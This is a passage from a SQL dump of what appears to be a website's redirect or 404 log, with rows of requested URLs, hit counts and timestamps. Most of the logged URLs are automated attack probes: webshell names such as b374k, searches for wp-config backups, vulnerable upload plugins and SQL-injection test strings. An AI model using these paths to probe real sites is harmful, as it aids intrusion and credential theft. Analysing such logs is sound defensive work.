00:00:00',301),(1611,'http://ekvatorprint.com.ua/testosteron.php',NULL,'','',1,0,'2016-08-02 13:51:13','0000-00-00 00:00:00',301),(1612,'http://ekvatorprint.com.ua/upfilees.php',NULL,'','',3,0,'2016-08-02 13:51:14','0000-00-00 00:00:00',301),(1613,'http://ekvatorprint.com.ua/upgrade.php',NULL,'','',10,0,'2016-08-02 13:51:14','0000-00-00 00:00:00',301),(1614,'http://ekvatorprint.com.ua/upsgrade.php',NULL,'','',3,0,'2016-08-02 13:51:15','0000-00-00 00:00:00',301),(1615,'http://ekvatorprint.com.ua/webshellkey.php',NULL,'','',1,0,'2016-08-02 13:51:15','0000-00-00 00:00:00',301),(1616,'http://ekvatorprint.com.ua/wpconf.php',NULL,'','',4,0,'2016-08-02 13:51:15','0000-00-00 00:00:00',301),(1617,'http://ekvatorprint.com.ua/wpindex.php',NULL,'','',3,0,'2016-08-02 13:51:16','0000-00-00 00:00:00',301),(1618,'http://ekvatorprint.com.ua/load.php',NULL,'','',2,0,'2016-08-02 13:51:17','0000-00-00 00:00:00',301),(1619,'http://ekvatorprint.com.ua/default.php',NULL,'','',7,0,'2016-08-02 13:51:17','0000-00-00 00:00:00',301),(1620,'http://ekvatorprint.com.ua/ratory.php',NULL,'','',1,0,'2016-08-02 13:51:18','0000-00-00 00:00:00',301),(1621,'http://ekvatorprint.com.ua/thanks.php',NULL,'','',2,0,'2016-08-02 13:51:18','0000-00-00 00:00:00',301),(1622,'http://ekvatorprint.com.ua/uy.php',NULL,'','',1,0,'2016-08-02 13:51:19','0000-00-00 00:00:00',301),(1623,'http://ekvatorprint.com.ua/CHANGELOG.php',NULL,'','',5,0,'2016-08-02 13:51:20','0000-00-00 00:00:00',301),(1624,'http://ekvatorprint.com.ua/index2.php',NULL,'','',10,0,'2016-08-02 13:51:35','0000-00-00 00:00:00',301),(1625,'http://ekvatorprint.com.ua/LICENSES.php',NULL,'','',3,0,'2016-08-02 13:51:36','0000-00-00 00:00:00',301),(1626,'http://ekvatorprint.com.ua/templates/gk_ilife/lib/scripts/menu.php',NULL,'','',146745,0,'2016-08-04 01:42:02','0000-00-00 00:00:00',301),(1627,'http://ekvatorprint.com.ua/index.php?view=article&id=1:2010-11-06-15-56-21&format=pdf&option=com_content',NULL,'','',25,0,'2016-08-05 02:41:15','0000-00-00 00:00:00',301),(1628,'http://ekvatorprint.com.ua/webroot/plugins/elfinder/elfinder.html',NULL,'','',1,0,'2016-08-05 23:46:46','0000-00-00 00:00:00',301),(1629,'http://ekvatorprint.com.ua/ext/elFinder/elfinder.html',NULL,'','',1,0,'2016-08-05 23:46:46','0000-00-00 00:00:00',301),(1630,'http://ekvatorprint.com.ua/vendor/elfinder/elfinder.html',NULL,'','',1,0,'2016-08-05 23:46:46','0000-00-00 00:00:00',301),(1631,'http://ekvatorprint.com.ua/js/lib/elfinder/elfinder.html',NULL,'','',1,0,'2016-08-05 23:46:46','0000-00-00 00:00:00',301),(1632,'http://ekvatorprint.com.ua/Public/static/elfinder/elfinder.html',NULL,'','',1,0,'2016-08-05 23:46:47','0000-00-00 00:00:00',301),(1633,'http://ekvatorprint.com.ua/webszerk/elfinder/elfinder.html',NULL,'','',1,0,'2016-08-05 23:46:47','0000-00-00 00:00:00',301),(1634,'http://ekvatorprint.com.ua/images/map(qatg-4n6sfrv7ty5y3s08joauhg).svg',NULL,'http://ekvatorprint.com.ua/printing-on-vinyl','',1,0,'2016-08-06 08:30:30','0000-00-00 00:00:00',301),(1635,'http://ekvatorprint.com.ua/index.php?option=com_jwallpapers&task=upload',NULL,'','',7,0,'2016-08-06 20:42:57','0000-00-00 00:00:00',301),(1636,'http://ekvatorprint.com.ua/?option=com_contact&view=contact&itemid=5',NULL,'','',1,0,'2016-08-06 22:34:36','0000-00-00 00:00:00',301),(1637,'http://ekvatorprint.com.ua/?view=contact&id=1&itemid=5',NULL,'','',1,0,'2016-08-06 22:41:51','0000-00-00 00:00:00',301),(1638,'http://ekvatorprint.com.ua/index.php?option=com_content&view=article&itemid=12',NULL,'','',1,0,'2016-08-06 22:41:52','0000-00-00 00:00:00',301),(1639,'http://ekvatorprint.com.ua/adodb.class.php',NULL,'','',7,0,'2016-08-07 02:08:40','0000-00-00 00:00:00',301),(1640,'http://ekvatorprint.com.ua/images/adodb.class.php',NULL,'','',2,0,'2016-08-07 02:08:41','0000-00-00 00:00:00',301),(1641,'http://ekvatorprint.com.ua/images/b374k-2.8.php',NULL,'','',2,0,'2016-08-07 02:08:42','0000-00-00 00:00:00',301),(1642,'http://ekvatorprint.com.ua/imgs/error-log.php',NULL,'','',1,0,'2016-08-07 02:08:43','0000-00-00 00:00:00',301),(1643,'http://ekvatorprint.com.ua/language/adodb.class.php',NULL,'','',2,0,'2016-08-07 02:08:43','0000-00-00 00:00:00',301),(1644,'http://ekvatorprint.com.ua/media/b374k-2.8.php',NULL,'','',2,0,'2016-08-07 02:08:44','0000-00-00 00:00:00',301),(1645,'http://ekvatorprint.com.ua/SocketIontrol.php',NULL,'','',3,0,'2016-08-07 02:08:46','0000-00-00 00:00:00',301),(1646,'http://ekvatorprint.com.ua/start.php',NULL,'','',9,0,'2016-08-07 02:08:47','0000-00-00 00:00:00',301),(1647,'http://ekvatorprint.com.ua/templates/adodb.class.php',NULL,'','',4,0,'2016-08-07 02:08:47','0000-00-00 00:00:00',301),(1648,'http://ekvatorprint.com.ua/templates/_hash.php',NULL,'','',2,0,'2016-08-07 02:08:48','0000-00-00 00:00:00',301),(1649,'http://ekvatorprint.com.ua/upgrade-network.php',NULL,'','',3,0,'2016-08-07 02:08:49','0000-00-00 00:00:00',301),(1650,'http://ekvatorprint.com.ua/wp-activate.php',NULL,'','',5,0,'2016-08-07 02:08:49','0000-00-00 00:00:00',301),(1651,'http://ekvatorprint.com.ua/wp-blog-header.php',NULL,'','',4,0,'2016-08-07 02:08:50','0000-00-00 00:00:00',301),(1652,'http://ekvatorprint.com.ua/wp-comments-post.php',NULL,'','',1,0,'2016-08-07 02:08:51','0000-00-00 00:00:00',301),(1653,'http://ekvatorprint.com.ua/wp-conff.php',NULL,'','',5,0,'2016-08-07 02:08:51','0000-00-00 00:00:00',301),(1654,'http://ekvatorprint.com.ua/wp-load.php',NULL,'','',4,0,'2016-08-07 02:08:53','0000-00-00 00:00:00',301),(1655,'http://ekvatorprint.com.ua/wp-mail.php',NULL,'','',1,0,'2016-08-07 02:08:54','0000-00-00 00:00:00',301),(1656,'http://ekvatorprint.com.ua/xmlrpc-activate.php',NULL,'','',7,0,'2016-08-07 02:08:55','0000-00-00 00:00:00',301),(1657,'http://ekvatorprint.com.ua/wp-content/plugins/revslider/temp/update_extract/fput.php?rpath=fput.php',NULL,'','',1,0,'2016-08-07 02:08:56','0000-00-00 00:00:00',301),(1658,'http://ekvatorprint.com.ua/wp-content/themes/THEME/style.php?act=1',NULL,'','',2,0,'2016-08-07 02:08:58','0000-00-00 00:00:00',301),(1659,'http://ekvatorprint.com.ua/administrator/components/com_simplephotogallery/simplephotogallery.xml',NULL,'http://ekvatorprint.com.ua/administrator/components/com_simplephotogallery/simplephotogallery.xml','',1,0,'2016-08-08 05:02:31','0000-00-00 00:00:00',301),(1660,'http://ekvatorprint.com.ua/http:/ekvatorprint.com.ua/images/shabloni_modulnih_kartin/????????????????',NULL,'','',2,0,'2016-08-08 10:06:45','0000-00-00 00:00:00',301),(1661,'http://ekvatorprint.com.ua/modules/mod_dionefileuploader/mod_dionefileuploader.xml',NULL,'http://ekvatorprint.com.ua/modules/mod_dionefileuploader/mod_dionefileuploader.xml','',1,0,'2016-08-08 16:52:01','0000-00-00 00:00:00',301),(1662,'http://ekvatorprint.com.ua/scripts/fckeditor/editor/',NULL,'','',2,0,'2016-08-09 17:55:55','0000-00-00 00:00:00',301),(1663,'http://ekvatorprint.com.ua/editor/editor/',NULL,'','',1,0,'2016-08-09 23:00:02','0000-00-00 00:00:00',301),(1664,'http://ekvatorprint.com.ua/editor/fckeditor/editor/',NULL,'','',2,0,'2016-08-10 01:02:58','0000-00-00 00:00:00',301),(1665,'http://ekvatorprint.com.ua/system/fckeditor/editor/',NULL,'','',2,0,'2016-08-10 03:04:52','0000-00-00 00:00:00',301),(1666,'http://ekvatorprint.com.ua/administrator/components/com_simpleimageupload/manifest.xml',NULL,'http://ekvatorprint.com.ua/administrator/components/com_simpleimageupload/manifest.xml','',1,0,'2016-08-11 14:03:24','0000-00-00 00:00:00',301),(1667,'http://ekvatorprint.com.ua/index.php?option=com_simpleimageupload&view=upload&tmpl=component',NULL,'http://ekvatorprint.com.ua/index.php?option=com_simpleimageupload&view=upload&tmpl=component','',1,0,'2016-08-12 06:16:55','0000-00-00 00:00:00',301),(1668,'http://ekvatorprint.com.ua/administrator/components/com_myblog/myblog.xml',NULL,'http://ekvatorprint.com.ua/administrator/components/com_myblog/myblog.xml','',1,0,'2016-08-12 13:33:48','0000-00-00 00:00:00',301),(1669,'http://ekvatorprint.com.ua/js/mage/cookies.js',NULL,'ekvatorprint.com.ua','',13,0,'2016-08-12 16:54:10','0000-00-00 00:00:00',301),(1670,'http://ekvatorprint.com.ua/outdoor-advertising#изготовление%20вывесок',NULL,'','',1,0,'2016-08-12 18:14:25','0000-00-00 00:00:00',301),(1671,'http://ekvatorprint.com.ua/modules/mod_creativecontactform/mod_creativecontactform.xml',NULL,'http://ekvatorprint.com.ua/modules/mod_creativecontactform/mod_creativecontactform.xml','',1,0,'2016-08-13 06:48:39','0000-00-00 00:00:00',301),(1672,'http://ekvatorprint.com.ua/wp-config.php_',NULL,'','',2,0,'2016-08-13 18:28:18','0000-00-00 00:00:00',301),(1673,'http://ekvatorprint.com.ua/wp-config.php-',NULL,'','',1,0,'2016-08-13 18:28:19','0000-00-00 00:00:00',301),(1674,'http://ekvatorprint.com.ua/wp-config.php__',NULL,'','',1,0,'2016-08-13 18:28:19','0000-00-00 00:00:00',301),(1675,'http://ekvatorprint.com.ua/wp-config.php1',NULL,'','',2,0,'2016-08-13 18:28:19','0000-00-00 00:00:00',301),(1676,'http://ekvatorprint.com.ua/wp-config.php.old',NULL,'','',11,0,'2016-08-13 18:28:22','0000-00-00 00:00:00',301),(1677,'http://ekvatorprint.com.ua/wp-config.php_old',NULL,'','',4,0,'2016-08-13 18:28:23','0000-00-00 00:00:00',301),(1678,'http://ekvatorprint.com.ua/wp-config.php-old',NULL,'','',2,0,'2016-08-13 18:28:23','0000-00-00 00:00:00',301),(1679,'http://ekvatorprint.com.ua/wp-content/plugins/reflex-gallery/admin/scripts/FileUploader/php.php?Year=2016&Month=08',NULL,'','',2,0,'2016-08-14 02:24:37','0000-00-00 00:00:00',301),(1680,'http://ekvatorprint.com.ua/button_close.svg',NULL,'http://ekvatorprint.com.ua/modulnye-kartiny','',1,0,'2016-08-14 10:41:36','0000-00-00 00:00:00',301),(1681,'http://ekvatorprint.com.ua/test_reg',NULL,'http://ekvatorprint.com.ua/contacts','',20,0,'2016-08-15 17:51:13','0000-00-00 00:00:00',301),(1682,'http://ekvatorprint.com.ua/modules/mod_ppc_simple_spotlight/elements/upload_file.php',NULL,'','',9,0,'2016-08-16 11:56:16','0000-00-00 00:00:00',301),(1683,'http://ekvatorprint.com.ua/authorize.php',NULL,'','',5,0,'2016-08-18 04:32:55','0000-00-00 00:00:00',301),(1684,'http://ekvatorprint.com.ua/b374k-2.8.php',NULL,'','',2,0,'2016-08-18 04:32:56','0000-00-00 00:00:00',301),(1685,'http://ekvatorprint.com.ua/cache.php?blog=1',NULL,'','',4,0,'2016-08-18 04:32:56','0000-00-00 00:00:00',301),(1686,'http://ekvatorprint.com.ua/cacheplugin.php',NULL,'','',2,0,'2016-08-18 04:32:57','0000-00-00 00:00:00',301),(1687,'http://ekvatorprint.com.ua/cfiles.php',NULL,'','',4,0,'2016-08-18 04:32:57','0000-00-00 00:00:00',301),(1688,'http://ekvatorprint.com.ua/.cpanel_config.php',NULL,'','',7,0,'2016-08-18 04:33:00','0000-00-00 00:00:00',301),(1689,'http://ekvatorprint.com.ua/database.php',NULL,'','',10,0,'2016-08-18 04:33:01','0000-00-00 00:00:00',301),(1690,'http://ekvatorprint.com.ua/general.php',NULL,'','',6,0,'2016-08-18 04:33:03','0000-00-00 00:00:00',301),(1691,'http://ekvatorprint.com.ua/get.php?key=sdfadsgh4513sdGG435341FDGWWDFGDFHDFGDSFGDFSGDFG',NULL,'','',5,0,'2016-08-18 04:33:04','0000-00-00 00:00:00',301),(1692,'http://ekvatorprint.com.ua/logsys.php',NULL,'','',2,0,'2016-08-18 04:33:09','0000-00-00 00:00:00',301),(1693,'http://ekvatorprint.com.ua/news_parser.class.php',NULL,'','',5,0,'2016-08-18 04:33:13','0000-00-00 00:00:00',301),(1694,'http://ekvatorprint.com.ua/ooimg.php',NULL,'','',4,0,'2016-08-18 04:33:14','0000-00-00 00:00:00',301),(1695,'http://ekvatorprint.com.ua/prelog.php',NULL,'','',2,0,'2016-08-18 04:33:14','0000-00-00 00:00:00',301),(1696,'http://ekvatorprint.com.ua/showthread.php',NULL,'','',5,0,'2016-08-18 04:33:17','0000-00-00 00:00:00',301),(1697,'http://ekvatorprint.com.ua/wp-check.php',NULL,'','',8,0,'2016-08-18 04:33:23','0000-00-00 00:00:00',301),(1698,'http://ekvatorprint.com.ua/wp-conas.php',NULL,'','',2,0,'2016-08-18 04:33:23','0000-00-00 00:00:00',301),(1699,'http://ekvatorprint.com.ua/wpfootes.php',NULL,'','',2,0,'2016-08-18 04:33:24','0000-00-00 00:00:00',301),(1700,'http://ekvatorprint.com.ua/wp-referer.php',NULL,'','',4,0,'2016-08-18 04:33:26','0000-00-00 00:00:00',301),(1701,'http://ekvatorprint.com.ua/wp-setup-step2.php',NULL,'','',2,0,'2016-08-18 04:33:26','0000-00-00 00:00:00',301),(1702,'http://ekvatorprint.com.ua/wp-tmp.php',NULL,'','',5,0,'2016-08-18 04:33:27','0000-00-00 00:00:00',301),(1703,'http://ekvatorprint.com.ua/wp-object-cache.php',NULL,'','',4,0,'2016-08-18 04:33:39','0000-00-00 00:00:00',301),(1704,'http://ekvatorprint.com.ua/filess.php',NULL,'','',4,0,'2016-08-18 04:33:41','0000-00-00 00:00:00',301),(1705,'http://ekvatorprint.com.ua/tempfs.php',NULL,'','',4,0,'2016-08-18 04:33:41','0000-00-00 00:00:00',301),(1706,'http://ekvatorprint.com.ua/uu.php',NULL,'','',4,0,'2016-08-18 04:33:41','0000-00-00 00:00:00',301),(1707,'http://ekvatorprint.com.ua/wp-plugin.php',NULL,'','',2,0,'2016-08-18 04:33:43','0000-00-00 00:00:00',301),(1708,'http://ekvatorprint.com.ua/components/com_simpleswfupload/uploadhandler.php',NULL,'http://ekvatorprint.com.ua/components/com_simpleswfupload/uploadhandler.php','',2,0,'2016-08-20 11:13:25','0000-00-00 00:00:00',301),(1709,'http://ekvatorprint.com.ua/ekvatorprint.com.ua.tgz',NULL,'','',6,0,'2016-08-21 01:21:02','0000-00-00 00:00:00',301),(1710,'http://ekvatorprint.com.ua/administrator/components/com_simpleswfupload/uploadhandler.php',NULL,'http://ekvatorprint.com.ua/administrator/components/com_simpleswfupload/uploadhandler.php','',3,0,'2016-08-22 07:57:40','0000-00-00 00:00:00',301),(1711,'http://ekvatorprint.com.ua/components/com_hwdvideoshare/assets/uploads/flash/flash_upload.php',NULL,'','',6,0,'2016-08-22 18:34:50','0000-00-00 00:00:00',301),(1712,'http://ekvatorprint.com.ua/index.php?option=com_content\'A=0&view=article&id=18&Itemid=19',NULL,'http://ekvatorprint.com.ua/index.php?option=com_content\'A=0&view=article&id=18&Itemid=19','',1,0,'2016-08-23 02:55:52','0000-00-00 00:00:00',301),(1713,'http://ekvatorprint.com.ua/index.php?option=com_content&view=article\'A=0&id=18&Itemid=19',NULL,'http://ekvatorprint.com.ua/index.php?option=com_content&view=article\'A=0&id=18&Itemid=19','',1,0,'2016-08-23 02:55:52','0000-00-00 00:00:00',301),(1714,'http://ekvatorprint.com.ua/blogs/wp-login.php',NULL,'','',1,0,'2016-08-23 20:50:16','0000-00-00 00:00:00',301),(1715,'http://ekvatorprint.com.ua/modules/homepageadvertise/uploadimage.php',NULL,'http://ekvatorprint.com.ua/modules/homepageadvertise/uploadimage.php','',3,0,'2016-08-25 05:17:50','0000-00-00 00:00:00',301),(1716,'http://ekvatorprint.com.ua/modules/columnadverts/uploadimage.php',NULL,'http://ekvatorprint.com.ua/modules/columnadverts/uploadimage.php','',6,0,'2016-08-25 05:17:51','0000-00-00 00:00:00',301),(1717,'http://ekvatorprint.com.ua/modules/homepageadvertise2/uploadimage.php',NULL,'http://ekvatorprint.com.ua/modules/homepageadvertise2/uploadimage.php','',2,0,'2016-08-25 05:17:51','0000-00-00 00:00:00',301),(1718,'http://ekvatorprint.com.ua/modules/simpleslideshow/uploadimage.php',NULL,'http://ekvatorprint.com.ua/modules/simpleslideshow/uploadimage.php','',4,0,'2016-08-25 05:17:52','0000-00-00 00:00:00',301),(1719,'http://ekvatorprint.com.ua/images/modulniekartini/мк-103.png',NULL,'','',3,0,'2016-08-25 09:50:56','0000-00-00 00:00:00',301),(1720,'http://ekvatorprint.com.ua/images/modulniekartini/мк-49.jpg',NULL,'','',2,0,'2016-08-25 09:57:01','0000-00-00 00:00:00',301),(1721,'http://ekvatorprint.com.ua/images/modulniekartini/мк-48.jpg',NULL,'','',2,0,'2016-08-25 09:57:09','0000-00-00 00:00:00',301),(1722,'http://ekvatorprint.com.ua/images/modulniekartini/мк-117.png',NULL,'','',3,0,'2016-08-25 09:57:17','0000-00-00 00:00:00',301),(1723,'http://ekvatorprint.com.ua/?option=com_content\'A=0&view=article&id=14&Itemid=15	0',NULL,'http://ekvatorprint.com.ua/?option=com_content\'A=0&view=article&id=14&Itemid=15	0','',2,0,'2016-08-25 19:21:54','0000-00-00 00:00:00',301),(1724,'http://ekvatorprint.com.ua/?option=com_content&view=article\'A=0&id=14&Itemid=15	0',NULL,'http://ekvatorprint.com.ua/?option=com_content&view=article\'A=0&id=14&Itemid=15	0','',2,0,'2016-08-25 19:22:15','0000-00-00 00:00:00',301),(1725,'http://ekvatorprint.com.ua/index.php/component/jdownloads/upload?Itemid=0',NULL,'http://ekvatorprint.com.ua/index.php/component/jdownloads/upload?Itemid=0','',1,0,'2016-08-27 07:02:45','0000-00-00 00:00:00',301),(1726,'http://ekvatorprint.com.ua/administrator/fix.php',NULL,'http://ekvatorprint.com.ua/administrator/fix.php','',4,0,'2016-08-28 10:46:36','0000-00-00 00:00:00',301),(1727,'http://ekvatorprint.com.ua/media/overrider/wp-xmlrpc.php',NULL,'http://ekvatorprint.com.ua/media/overrider/wp-xmlrpc.php','',4,0,'2016-08-28 10:46:36','0000-00-00 00:00:00',301),(1728,'http://ekvatorprint.com.ua/tmp/mod_add1.php',NULL,'http://ekvatorprint.com.ua/tmp/mod_add1.php','',4,0,'2016-08-28 10:46:36','0000-00-00 00:00:00',301),(1729,'http://ekvatorprint.com.ua/modules/mod_config/mod_config.php',NULL,'http://ekvatorprint.com.ua/modules/mod_config/mod_config.php','',4,0,'2016-08-28 10:46:36','0000-00-00 00:00:00',301),(1730,'http://ekvatorprint.com.ua/images/main.php',NULL,'http://ekvatorprint.com.ua/images/main.php','',4,0,'2016-08-28 10:46:37','0000-00-00 00:00:00',301),(1731,'http://ekvatorprint.com.ua/modules/mod_ya/mod_ya.php',NULL,'http://ekvatorprint.com.ua/modules/mod_ya/mod_ya.php','',5,0,'2016-08-28 10:46:37','0000-00-00 00:00:00',301),(1732,'http://ekvatorprint.com.ua/media/editors/tinymce/jscripts/tiny_mce/plugins/inlinepopups/skins/clearlooks2/pages.php',NULL,'http://ekvatorprint.com.ua/media/editors/tinymce/jscripts/tiny_mce/plugins/inlinepopups/skins/clearlooks2/pages.php','',4,0,'2016-08-28 10:46:37','0000-00-00 00:00:00',301),(1733,'http://ekvatorprint.com.ua/modules/mod_articless/ir.php',NULL,'http://ekvatorprint.com.ua/modules/mod_articless/ir.php','',4,0,'2016-08-28 10:46:37','0000-00-00 00:00:00',301),(1734,'http://ekvatorprint.com.ua/plugins/captcha/jproicaptcha/system_ml.php',NULL,'http://ekvatorprint.com.ua/plugins/captcha/jproicaptcha/system_ml.php','',3,0,'2016-08-28 10:46:37','0000-00-00 00:00:00',301),(1735,'http://ekvatorprint.com.ua/includes/class.php',NULL,'http://ekvatorprint.com.ua/includes/class.php','',4,0,'2016-08-28 10:46:37','0000-00-00 00:00:00',301),(1736,'http://ekvatorprint.com.ua/tmp/0.php',NULL,'http://ekvatorprint.com.ua/tmp/0.php','',4,0,'2016-08-28 10:46:37','0000-00-00 00:00:00',301),(1737,'http://ekvatorprint.com.ua/media/editors/tinymce/jscripts/tiny_mce/themes/advanced/skins/o2k7/img/main.php',NULL,'http://ekvatorprint.com.ua/media/editors/tinymce/jscripts/tiny_mce/themes/advanced/skins/o2k7/img/main.php','',4,0,'2016-08-28 10:46:37','0000-00-00 00:00:00',301),(1738,'http://ekvatorprint.com.ua/media/editors/tinymce/jscripts/tiny_mce/themes/advanced/skins/default/pages.php',NULL,'http://ekvatorprint.com.ua/media/editors/tinymce/jscripts/tiny_mce/themes/advanced/skins/default/pages.php','',4,0,'2016-08-28 10:46:37','0000-00-00 00:00:00',301),(1739,'http://ekvatorprint.com.ua/media/editors/tinymce/jscripts/tiny_mce/plugins/inlinepopups/skins/clearlooks2/img/uplo.php',NULL,'http://ekvatorprint.com.ua/media/editors/tinymce/jscripts/tiny_mce/plugins/inlinepopups/skins/clearlooks2/img/uplo.php','',4,0,'2016-08-28 10:46:37','0000-00-00 00:00:00',301),(1740,'http://ekvatorprint.com.ua/media/editors/tinymce/jscripts/tiny_mce/themes/simple/skins/o2k7/img/main.php',NULL,'http://ekvatorprint.com.ua/media/editors/tinymce/jscripts/tiny_mce/themes/simple/skins/o2k7/img/main.php','',4,0,'2016-08-28 10:46:37','0000-00-00 00:00:00',301),(1741,'http://ekvatorprint.com.ua/administrator/pack2.php',NULL,'http://ekvatorprint.com.ua/administrator/pack2.php','',3,0,'2016-08-28 11:17:16','0000-00-00 00:00:00',301),(1742,'http://ekvatorprint.com.ua/administrator/mod_araticlws.php',NULL,'http://ekvatorprint.com.ua/administrator/mod_araticlws.php','',3,0,'2016-08-28 11:17:16','0000-00-00 00:00:00',301),(1743,'http://ekvatorprint.com.ua/administrator/components/com_menus/views/item/thumbs.php',NULL,'http://ekvatorprint.com.ua/administrator/components/com_menus/views/item/thumbs.php','',3,0,'2016-08-28 11:17:16','0000-00-00 00:00:00',301),(1744,'http://ekvatorprint.com.ua/administrator/components/com_joomlapack/classes/engine/thumbs.php',NULL,'http://ekvatorprint.com.ua/administrator/components/com_joomlapack/classes/engine/thumbs.php','',4,0,'2016-08-28 11:17:17','0000-00-00 00:00:00',301),(1745,'http://ekvatorprint.com.ua/components/com_aicontactsafe/controllers/sys.php',NULL,'http://ekvatorprint.com.ua/components/com_aicontactsafe/controllers/sys.php','',3,0,'2016-08-28 11:17:17','0000-00-00 00:00:00',301),(1746,'http://ekvatorprint.com.ua/administrator/components/com_admin/cacheplugin.php',NULL,'http://ekvatorprint.com.ua/administrator/components/com_admin/cacheplugin.php','',4,0,'2016-08-28 11:17:17','0000-00-00 00:00:00',301),(1747,'http://ekvatorprint.com.ua/administrator/components/com_jce/views/preferences/thumbs.php',NULL,'http://ekvatorprint.com.ua/administrator/components/com_jce/views/preferences/thumbs.php','',3,0,'2016-08-28 11:17:17','0000-00-00 00:00:00',301),(1748,'http://ekvatorprint.com.ua/administrator/pack.php',NULL,'http://ekvatorprint.com.ua/administrator/pack.php','',3,0,'2016-08-28 11:17:17','0000-00-00 00:00:00',301),(1749,'http://ekvatorprint.com.ua/administrator/components/com_banners/web-infor.php',NULL,'http://ekvatorprint.com.ua/administrator/components/com_banners/web-infor.php','',4,0,'2016-08-28 11:17:18','0000-00-00 00:00:00',301),(1750,'http://ekvatorprint.com.ua/components/com_rsform/controller/functions.php',NULL,'http://ekvatorprint.com.ua/components/com_rsform/controller/functions.php','',3,0,'2016-08-28 11:17:43','0000-00-00 00:00:00',301),(1751,'http://ekvatorprint.com.ua/images/htaccess.php',NULL,'http://ekvatorprint.com.ua/images/htaccess.php','',4,0,'2016-08-28 11:17:43','0000-00-00 00:00:00',301),(1752,'http://ekvatorprint.com.ua/components/com_weblinks/models/gallery.php',NULL,'http://ekvatorprint.com.ua/components/com_weblinks/models/gallery.php','',3,0,'2016-08-28 11:17:43','0000-00-00 00:00:00',301),(1753,'http://ekvatorprint.com.ua/components/com_search/search_module.php',NULL,'http://ekvatorprint.com.ua/components/com_search/search_module.php','',5,0,'2016-08-28 11:17:44','0000-00-00 00:00:00',301),(1754,'http://ekvatorprint.com.ua/components/com_contact/wp-xmlrpc.php',NULL,'http://ekvatorprint.com.ua/components/com_contact/wp-xmlrpc.php','',3,0,'2016-08-28 11:17:44','0000-00-00 00:00:00',301),(1755,'http://ekvatorprint.com.ua/components/com_jce/editor/tiny_mce/themes/advanced/skins/default/img/en.php',NULL,'http://ekvatorprint.com.ua/components/com_jce/editor/tiny_mce/themes/advanced/skins/default/img/en.php','',3,0,'2016-08-28 11:17:44','0000-00-00 00:00:00',301),(1756,'http://ekvatorprint.com.ua/images/jquery.php',NULL,'http://ekvatorprint.com.ua/images/jquery.php','',4,0,'2016-08-28 11:17:44','0000-00-00 00:00:00',301),(1757,'http://ekvatorprint.com.ua/components/com_mailto/views/mailto/tmpl/fream_system.php',NULL,'http://ekvatorprint.com.ua/components/com_mailto/views/mailto/tmpl/fream_system.php','',3,0,'2016-08-28 11:17:44','0000-00-00 00:00:00',301),(1758,'http://ekvatorprint.com.ua/components/com_contact/views/contact/tmpl/default_contact_group.php',NULL,'http://ekvatorprint.com.ua/components/com_contact/views/contact/tmpl/default_contact_group.php','',3,0,'2016-08-28 11:17:44','0000-00-00 00:00:00',301),(1759,'http://ekvatorprint.com.ua/components/com_mailto/mail.php',NULL,'http://ekvatorprint.com.ua/components/com_mailto/mail.php','',5,0,'2016-08-28 11:17:44','0000-00-00 00:00:00',301),(1760,'http://ekvatorprint.com.ua/components/com_jce/editor/tiny_mce/themes/none/skins/lndex.php',NULL,'http://ekvatorprint.com.ua/components/com_jce/editor/tiny_mce/themes/none/skins/lndex.php','',4,0,'2016-08-28 11:17:44','0000-00-00 00:00:00',301),(1761,'http://ekvatorprint.com.ua/components/com_jce/editor/tiny_mce/themes/advanced/skins/o2k7/img/en.php',NULL,'http://ekvatorprint.com.ua/components/com_jce/editor/tiny_mce/themes/advanced/skins/o2k7/img/en.php','',3,0,'2016-08-28 11:17:45','0000-00-00 00:00:00',301),(1762,'http://ekvatorprint.com.ua/components/com_jce/editor/tiny_mce/themes/thumbs.php',NULL,'http://ekvatorprint.com.ua/components/com_jce/editor/tiny_mce/themes/thumbs.php','',4,0,'2016-08-28 11:17:45','0000-00-00 00:00:00',301),(1763,'http://ekvatorprint.com.ua/components/com_jce/editor/tiny_mce/plugins/thumbs.php',NULL,'http://ekvatorprint.com.ua/components/com_jce/editor/tiny_mce/plugins/thumbs.php','',5,0,'2016-08-28 11:17:45','0000-00-00 00:00:00',301),(1764,'http://ekvatorprint.com.ua/images/php.php',NULL,'http://ekvatorprint.com.ua/images/php.php','',3,0,'2016-08-28 11:18:10','0000-00-00 00:00:00',301),(1765,'http://ekvatorprint.com.ua/images/selena/c4ca423.php',NULL,'http://ekvatorprint.com.ua/images/selena/c4ca423.php','',3,0,'2016-08-28 11:18:10','0000-00-00 00:00:00',301),(1766,'http://ekvatorprint.com.ua/images/page.php',NULL,'http://ekvatorprint.com.ua/images/page.php','',5,0,'2016-08-28 11:18:10','0000-00-00 00:00:00',301),(1767,'http://ekvatorprint.com.ua/includes/core.php',NULL,'http://ekvatorprint.com.ua/includes/core.php','',5,0,'2016-08-28 11:18:10','0000-00-00 00:00:00',301),(1768,'http://ekvatorprint.com.ua/includes/ms-default-base.php',NULL,'http://ekvatorprint.com.ua/includes/ms-default-base.php','',3,0,'2016-08-28 11:18:10','0000-00-00 00:00:00',301),(1769,'http://ekvatorprint.com.ua/images/uplo.php',NULL,'http://ekvatorprint.com.ua/images/uplo.php','',3,0,'2016-08-28 11:18:10','0000-00-00 00:00:00',301),(1770,'http://ekvatorprint.com.ua/media/editors/tinymce/jscripts/tiny_mce/plugins/advhr/langs/main.php',NULL,'http://ekvatorprint.com.ua/media/editors/tinymce/jscripts/tiny_mce/plugins/advhr/langs/main.php','',3,0,'2016-08-28 11:18:10','0000-00-00 00:00:00',301),(1771,'http://ekvatorprint.com.ua/libraries/simplepie/idn/openidopenid.php',NULL,'http://ekvatorprint.com.ua/libraries/simplepie/idn/openidopenid.php','',4,0,'2016-08-28 11:18:10','0000-00-00 00:00:00',301),(1772,'http://ekvatorprint.com.ua/libraries/joomla/document/feed/renderer/thumbs.php',NULL,'http://ekvatorprint.com.ua/libraries/joomla/document/feed/renderer/thumbs.php','',3,0,'2016-08-28 11:18:10','0000-00-00 00:00:00',301),(1773,'http://ekvatorprint.com.ua/images/res.php',NULL,'http://ekvatorprint.com.ua/images/res.php','',4,0,'2016-08-28 11:18:11','0000-00-00 00:00:00',301),(1774,'http://ekvatorprint.com.ua/includes/mconfig.php',NULL,'http://ekvatorprint.com.ua/includes/mconfig.php','',4,0,'2016-08-28 11:18:11','0000-00-00 00:00:00',301),(1775,'http://ekvatorprint.com.ua/logs/cgi-bin.php',NULL,'http://ekvatorprint.com.ua/logs/cgi-bin.php','',3,0,'2016-08-28 11:18:11','0000-00-00 00:00:00',301),(1776,'http://ekvatorprint.com.ua/includes/system1.php',NULL,'http://ekvatorprint.com.ua/includes/system1.php','',3,0,'2016-08-28 11:18:11','0000-00-00 